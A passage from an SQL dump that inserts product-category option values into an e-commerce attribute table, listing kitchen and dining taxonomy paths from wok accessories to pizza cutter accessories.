(3394, 3394, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Cookware Accessories > Wok Accessories > Wok Brushes'),
(3395, 3395, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Cookware Accessories > Wok Accessories > Wok Rings'),
(3396, 3396, 0, 'Home & Garden > Kitchen & Dining > Food & Beverage Carriers'),
(3397, 3397, 0, 'Home & Garden > Kitchen & Dining > Food & Beverage Carriers > Airpots'),
(3398, 3398, 0, 'Home & Garden > Kitchen & Dining > Food & Beverage Carriers > Canteens'),
(3399, 3399, 0, 'Home & Garden > Kitchen & Dining > Food & Beverage Carriers > Coolers'),
(3400, 3400, 0, 'Home & Garden > Kitchen & Dining > Food & Beverage Carriers > Drink Sleeves'),
(3401, 3401, 0, 'Home & Garden > Kitchen & Dining > Food & Beverage Carriers > Drink Sleeves > Can & Bottle Sleeves'),
(3402, 3402, 0, 'Home & Garden > Kitchen & Dining > Food & Beverage Carriers > Drink Sleeves > Cup Sleeves'),
(3403, 3403, 0, 'Home & Garden > Kitchen & Dining > Food & Beverage Carriers > Flasks'),
(3404, 3404, 0, 'Home & Garden > Kitchen & Dining > Food & Beverage Carriers > Insulated Bags'),
(3405, 3405, 0, 'Home & Garden > Kitchen & Dining > Food & Beverage Carriers > Lunch Boxes & Totes'),
(3406, 3406, 0, 'Home & Garden > Kitchen & Dining > Food & Beverage Carriers > Picnic Baskets'),
(3407, 3407, 0, 'Home & Garden > Kitchen & Dining > Food & Beverage Carriers > Replacement Drink Lids'),
(3408, 3408, 0, 'Home & Garden > Kitchen & Dining > Food & Beverage Carriers > Thermoses'),
(3409, 3409, 0, 'Home & Garden > Kitchen & Dining > Food & Beverage Carriers > Water Bottles'),
(3410, 3410, 0, 'Home & Garden > Kitchen & Dining > Food & Beverage Carriers > Wine Carrier Bags'),
(3411, 3411, 0, 'Home & Garden > Kitchen & Dining > Food Storage'),
(3412, 3412, 0, 'Home & Garden > Kitchen & Dining > Food Storage > Bread Boxes & Bags'),
(3413, 3413, 0, 'Home & Garden > Kitchen & Dining > Food Storage > Candy Buckets'),
(3414, 3414, 0, 'Home & Garden > Kitchen & Dining > Food Storage > Cookie Jars'),
(3415, 3415, 0, 'Home & Garden > Kitchen & Dining > Food Storage > Food Container Covers'),
(3416, 3416, 0, 'Home & Garden > Kitchen & Dining > Food Storage > Food Storage Bags'),
(3417, 3417, 0, 'Home & Garden > Kitchen & Dining > Food Storage > Food Storage Containers'),
(3418, 3418, 0, 'Home & Garden > Kitchen & Dining > Food Storage > Food Wraps'),
(3419, 3419, 0, 'Home & Garden > Kitchen & Dining > Food Storage > Food Wraps > Foil'),
(3420, 3420, 0, 'Home & Garden > Kitchen & Dining > Food Storage > Food Wraps > Parchment Paper'),
(3421, 3421, 0, 'Home & Garden > Kitchen & Dining > Food Storage > Food Wraps > Plastic Wrap'),
(3422, 3422, 0, 'Home & Garden > Kitchen & Dining > Food Storage > Food Wraps > Wax Paper'),
(3423, 3423, 0, 'Home & Garden > Kitchen & Dining > Food Storage > Honey Jars'),
(3424, 3424, 0, 'Home & Garden > Kitchen & Dining > Food Storage Accessories'),
(3425, 3425, 0, 'Home & Garden > Kitchen & Dining > Food Storage Accessories > Food & Beverage Labels'),
(3426, 3426, 0, 'Home & Garden > Kitchen & Dining > Food Storage Accessories > Food Wrap Dispensers'),
(3427, 3427, 0, 'Home & Garden > Kitchen & Dining > Food Storage Accessories > Oxygen Absorbers'),
(3428, 3428, 0, 'Home & Garden > Kitchen & Dining > Food Storage Accessories > Twist Ties & Bag Clips'),
(3429, 3429, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories'),
(3430, 3430, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Breadmaker Accessories'),
(3431, 3431, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Coffee Maker & Espresso Machine Accessories'),
(3432, 3432, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Coffee Maker & Espresso Machine Accessories > Coffee Decanter Warmers'),
(3433, 3433, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Coffee Maker & Espresso Machine Accessories > Coffee Decanters'),
(3434, 3434, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Coffee Maker & Espresso Machine Accessories > Coffee Filter Baskets'),
(3435, 3435, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Coffee Maker & Espresso Machine Accessories > Coffee Filters'),
(3436, 3436, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Coffee Maker & Espresso Machine Accessories > Coffee Grinder Accessories'),
(3437, 3437, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Coffee Maker & Espresso Machine Accessories > Coffee Grinders'),
(3438, 3438, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Coffee Maker & Espresso Machine Accessories > Coffee Maker & Espresso Machine Replacement Parts'),
(3439, 3439, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Coffee Maker & Espresso Machine Accessories > Coffee Maker Water Filters'),
(3440, 3440, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Coffee Maker & Espresso Machine Accessories > Frothing Pitchers'),
(3441, 3441, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Coffee Maker & Espresso Machine Accessories > Portafilters'),
(3442, 3442, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Cooktop, Oven & Range Accessories'),
(3443, 3443, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Cotton Candy Machine Accessories'),
(3444, 3444, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Deep Fryer Accessories'),
(3445, 3445, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Dishwasher Parts & Accessories'),
(3446, 3446, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Electric Kettle Accessories'),
(3447, 3447, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Electric Skillet & Wok Accessories'),
(3448, 3448, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Fondue Set Accessories'),
(3449, 3449, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Fondue Set Accessories > Cooking Gel Fuels'),
(3450, 3450, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Fondue Set Accessories > Fondue Forks'),
(3451, 3451, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Fondue Set Accessories > Fondue Pot Stands'),
(3452, 3452, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Food Dehydrator Accessories'),
(3453, 3453, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Food Dehydrator Accessories > Food Dehydrator Sheets'),
(3454, 3454, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Food Dehydrator Accessories > Food Dehydrator Trays'),
(3455, 3455, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Food Grinder Accessories'),
(3456, 3456, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Food Mixer & Blender Accessories'),
(3457, 3457, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Freezer Accessories'),
(3458, 3458, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Garbage Disposal Accessories'),
(3459, 3459, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Ice Cream Maker Accessories'),
(3460, 3460, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Ice Cream Maker Accessories > Ice Cream Maker Freezer Bowls'),
(3461, 3461, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Ice Crusher & Shaver Accessories'),
(3462, 3462, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Ice Maker Accessories'),
(3463, 3463, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Juicer Accessories'),
(3464, 3464, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Microwave Oven Accessories'),
(3465, 3465, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Outdoor Grill Accessories'),
(3466, 3466, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Outdoor Grill Accessories > Charcoal Briquettes'),
(3467, 3467, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Outdoor Grill Accessories > Charcoal Chimneys'),
(3468, 3468, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Outdoor Grill Accessories > Outdoor Grill Carts'),
(3469, 3469, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Outdoor Grill Accessories > Outdoor Grill Covers'),
(3470, 3470, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Outdoor Grill Accessories > Outdoor Grill Racks & Toppers'),
(3471, 3471, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Outdoor Grill Accessories > Outdoor Grill Replacement Parts'),
(3472, 3472, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Outdoor Grill Accessories > Outdoor Grill Spits & Baskets'),
(3473, 3473, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Outdoor Grill Accessories > Outdoor Grilling Planks'),
(3474, 3474, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Outdoor Grill Accessories > Smoking Chips & Pellets'),
(3475, 3475, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Pasta Maker Accessories'),
(3476, 3476, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Popcorn Maker Accessories'),
(3477, 3477, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Portable Cooking Stove Accessories'),
(3478, 3478, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Range Hood Accessories'),
(3479, 3479, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Refrigerator Accessories'),
(3480, 3480, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Soda Maker Accessories'),
(3481, 3481, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Steam Table Accessories'),
(3482, 3482, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Steam Table Accessories > Steam Table Pan Covers'),
(3483, 3483, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Steam Table Accessories > Steam Table Pans'),
(3484, 3484, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Toaster Accessories'),
(3485, 3485, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Vacuum Sealer Accessories'),
(3486, 3486, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Vacuum Sealer Accessories > Vacuum Sealer Bags'),
(3487, 3487, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Waffle Iron Accessories'),
(3488, 3488, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Water Cooler Accessories'),
(3489, 3489, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Water Cooler Accessories > Water Cooler Bottles'),
(3490, 3490, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Wine Fridge Accessories'),
(3491, 3491, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliance Accessories > Yogurt Maker Accessories'),
(3492, 3492, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances'),
(3493, 3493, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Beverage Warmers'),
(3494, 3494, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Breadmakers'),
(3495, 3495, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Chocolate Tempering Machines'),
(3496, 3496, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Coffee Makers & Espresso Machines'),
(3497, 3497, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Coffee Makers & Espresso Machines > Drip Coffee Makers'),
(3498, 3498, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Coffee Makers & Espresso Machines > Electric & Stovetop Espresso Pots'),
(3499, 3499, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Coffee Makers & Espresso Machines > Espresso Machines'),
(3500, 3500, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Coffee Makers & Espresso Machines > French Presses'),
(3501, 3501, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Coffee Makers & Espresso Machines > Percolators'),
(3502, 3502, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Coffee Makers & Espresso Machines > Vacuum Coffee Makers'),
(3503, 3503, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Cooktops'),
(3504, 3504, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Cotton Candy Machines'),
(3505, 3505, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Deep Fryers'),
(3506, 3506, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Deli Slicers'),
(3507, 3507, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Dishwashers'),
(3508, 3508, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Electric Griddles & Grills'),
(3509, 3509, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Electric Kettles'),
(3510, 3510, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Electric Skillets & Woks'),
(3511, 3511, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Fondue Pots & Sets'),
(3512, 3512, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Food Cookers & Steamers'),
(3513, 3513, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Food Cookers & Steamers > Egg Cookers'),
(3514, 3514, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Food Cookers & Steamers > Food Steamers'),
(3515, 3515, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Food Cookers & Steamers > Rice Cookers'),
(3516, 3516, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Food Cookers & Steamers > Slow Cookers'),
(3517, 3517, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Food Cookers & Steamers > Thermal Cookers'),
(3518, 3518, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Food Cookers & Steamers > Water Ovens'),
(3519, 3519, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Food Dehydrators'),
(3520, 3520, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Food Grinders & Mills'),
(3521, 3521, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Food Mixers & Blenders'),
(3522, 3522, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Food Smokers'),
(3523, 3523, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Food Warmers'),
(3524, 3524, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Food Warmers > Chafing Dishes'),
(3525, 3525, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Food Warmers > Food Heat Lamps'),
(3526, 3526, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Food Warmers > Rice Keepers'),
(3527, 3527, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Food Warmers > Steam Tables'),
(3528, 3528, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Freezers'),
(3529, 3529, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Frozen Drink Makers'),
(3530, 3530, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Garbage Disposals'),
(3531, 3531, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Gas Griddles'),
(3532, 3532, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Hot Drink Makers'),
(3533, 3533, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Hot Plates'),
(3534, 3534, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Ice Cream Makers'),
(3535, 3535, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Ice Crushers & Shavers'),
(3536, 3536, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Ice Makers'),
(3537, 3537, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Juicers'),
(3538, 3538, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Knife Sharpeners'),
(3539, 3539, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Microwave Ovens'),
(3540, 3540, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Milk Frothers & Steamers'),
(3541, 3541, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Mochi Makers'),
(3542, 3542, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Outdoor Grills'),
(3543, 3543, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Ovens'),
(3544, 3544, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Pasta Makers'),
(3545, 3545, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Popcorn Makers'),
(3546, 3546, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Portable Cooking Stoves'),
(3547, 3547, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Range Hoods'),
(3548, 3548, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Ranges'),
(3549, 3549, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Refrigerators'),
(3550, 3550, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Roaster Ovens & Rotisseries'),
(3551, 3551, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Soda Makers'),
(3552, 3552, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Soy Milk Makers'),
(3553, 3553, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Tea Makers'),
(3554, 3554, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Toasters & Grills'),
(3555, 3555, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Toasters & Grills > Countertop & Toaster Ovens'),
(3556, 3556, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Toasters & Grills > Donut Makers'),
(3557, 3557, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Toasters & Grills > Muffin & Cupcake Makers'),
(3558, 3558, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Toasters & Grills > Pizza Makers & Ovens'),
(3559, 3559, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Toasters & Grills > Pizzelle Makers'),
(3560, 3560, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Toasters & Grills > Pretzel Makers'),
(3561, 3561, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Toasters & Grills > Sandwich Makers'),
(3562, 3562, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Toasters & Grills > Toasters'),
(3563, 3563, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Toasters & Grills > Tortilla & Flatbread Makers'),
(3564, 3564, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Toasters & Grills > Waffle Irons'),
(3565, 3565, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Trash Compactors'),
(3566, 3566, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Vacuum Sealers'),
(3567, 3567, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Water Coolers'),
(3568, 3568, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Water Filters'),
(3569, 3569, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Wine Fridges'),
(3570, 3570, 0, 'Home & Garden > Kitchen & Dining > Kitchen Appliances > Yogurt Makers'),
(3571, 3571, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils'),
(3572, 3572, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Aprons'),
(3573, 3573, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Baking Peels'),
(3574, 3574, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Basters'),
(3575, 3575, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Basting Brushes'),
(3576, 3576, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Beverage Dispensers'),
(3577, 3577, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Cake Decorating Supplies'),
(3578, 3578, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Cake Servers'),
(3579, 3579, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Can Crushers'),
(3580, 3580, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Can Openers'),
(3581, 3581, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Carving Forks'),
(3582, 3582, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Channel Knives'),
(3583, 3583, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Colanders & Strainers'),
(3584, 3584, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Condiment Dispensers'),
(3585, 3585, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Cookie Cutters'),
(3586, 3586, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Cookie Presses'),
(3587, 3587, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Cooking Thermometer Accessories'),
(3588, 3588, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Cooking Thermometers'),
(3589, 3589, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Cooking Timers'),
(3590, 3590, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Cooking Torches'),
(3591, 3591, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Cooling Racks'),
(3592, 3592, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Cutting Boards'),
(3593, 3593, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Dish Racks & Drain Boards'),
(3594, 3594, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Dough Wheels'),
(3595, 3595, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Electric Knife Accessories'),
(3596, 3596, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Electric Knife Accessories > Electric Knife Replacement Blades'),
(3597, 3597, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Electric Knives'),
(3598, 3598, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Flour Sifters'),
(3599, 3599, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Food & Drink Stencils'),
(3600, 3600, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Food Crackers'),
(3601, 3601, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Food Crackers > Lobster & Crab Crackers'),
(3602, 3602, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Food Crackers > Nutcrackers'),
(3603, 3603, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Food Crackers > Nutcrackers > Decorative Nutcrackers'),
(3604, 3604, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Food Dispensers'),
(3605, 3605, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Food Graters & Zesters'),
(3606, 3606, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Food Peelers & Corers'),
(3607, 3607, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Food Steaming Bags'),
(3608, 3608, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Food Sticks & Skewers'),
(3609, 3609, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Funnels'),
(3610, 3610, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Garlic Presses'),
(3611, 3611, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Gelatin Molds'),
(3612, 3612, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Ice Cube Trays'),
(3613, 3613, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Jerky Guns'),
(3614, 3614, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Kitchen Knives'),
(3615, 3615, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Kitchen Molds'),
(3616, 3616, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Kitchen Organizers'),
(3617, 3617, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Kitchen Organizers > Can Organizers'),
(3618, 3618, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Kitchen Organizers > Drinkware Holders'),
(3619, 3619, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Kitchen Organizers > Kitchen Cabinet Organizers'),
(3620, 3620, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Kitchen Organizers > Kitchen Counter & Beverage Station Organizers'),
(3621, 3621, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Kitchen Organizers > Kitchen Utensil Holders & Racks'),
(3622, 3622, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Kitchen Organizers > Knife Blocks & Holders'),
(3623, 3623, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Kitchen Organizers > Napkin Holders & Dispensers'),
(3624, 3624, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Kitchen Organizers > Paper Towel Holders & Dispensers'),
(3625, 3625, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Kitchen Organizers > Pot Racks'),
(3626, 3626, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Kitchen Organizers > Spice Organizers'),
(3627, 3627, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Kitchen Organizers > Straw Holders & Dispensers'),
(3628, 3628, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Kitchen Organizers > Sugar Caddies'),
(3629, 3629, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Kitchen Organizers > Toothpick Holders & Dispensers'),
(3630, 3630, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Kitchen Organizers > Utensil & Flatware Trays'),
(3631, 3631, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Kitchen Scrapers'),
(3632, 3632, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Kitchen Scrapers > Bench Scrapers'),
(3633, 3633, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Kitchen Scrapers > Bowl Scrapers'),
(3634, 3634, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Kitchen Scrapers > Grill Scrapers'),
(3635, 3635, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Kitchen Shears'),
(3636, 3636, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Kitchen Slicers'),
(3637, 3637, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Kitchen Utensil Sets'),
(3638, 3638, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Ladles'),
(3639, 3639, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Mashers'),
(3640, 3640, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Measuring Cups & Spoons'),
(3641, 3641, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Meat Tenderizers'),
(3642, 3642, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Mixing Bowls'),
(3643, 3643, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Mortars & Pestles'),
(3644, 3644, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Oil & Vinegar Dispensers');
INSERT INTO `eav_attribute_option_value` (`value_id`, `option_id`, `store_id`, `value`) VALUES
(3645, 3645, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Oven Bags'),
(3646, 3646, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Oven Mitts & Pot Holders'),
(3647, 3647, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Pasta Molds & Stamps'),
(3648, 3648, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Pastry Blenders'),
(3649, 3649, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Pastry Cloths'),
(3650, 3650, 0, 'Home & Garden > Kitchen & Dining > Kitchen Tools & Utensils > Pizza Cutter Accessories'),
